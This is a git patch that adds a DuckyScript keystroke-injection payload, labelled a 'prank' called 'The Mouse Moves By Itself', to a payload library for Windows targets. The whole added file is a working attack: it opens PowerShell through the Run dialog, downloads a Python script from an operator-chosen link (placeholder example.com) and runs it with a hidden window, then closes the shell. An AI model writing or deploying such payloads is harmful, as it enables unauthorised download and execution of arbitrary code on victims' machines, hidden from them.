From 603015460d2f8f0841ed20771c955afc0a1c499c Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 14:25:06 +0200 Subject: [PATCH] The Mouse Moves By Itself --- .../The_Mouse_Moves_By_Itself/payload.txt | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt new file mode 100644 index 0000000..9abbe92 --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt @@ -0,0 +1,35 @@ +REM ############################################ +REM # | +REM # Title : The Mouse Moves By Itself | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Prank | +REM # Target : Windows 10/11 | +REM # | +REM ############################################ + + +REM Requirements: +REM - Internet Connection + + +REM REQUIRED - Set your Python script link +DEFINE SCRIPT-PY-LINK example.com + + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +ENTER +DELAY 500 + +STRING Invoke-WebRequest -Uri " +STRING SCRIPT-PY-LINK +STRING " -OutFile "script.py" +ENTER +DELAY 500 + +STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden +DELAY 1000 +ALT F4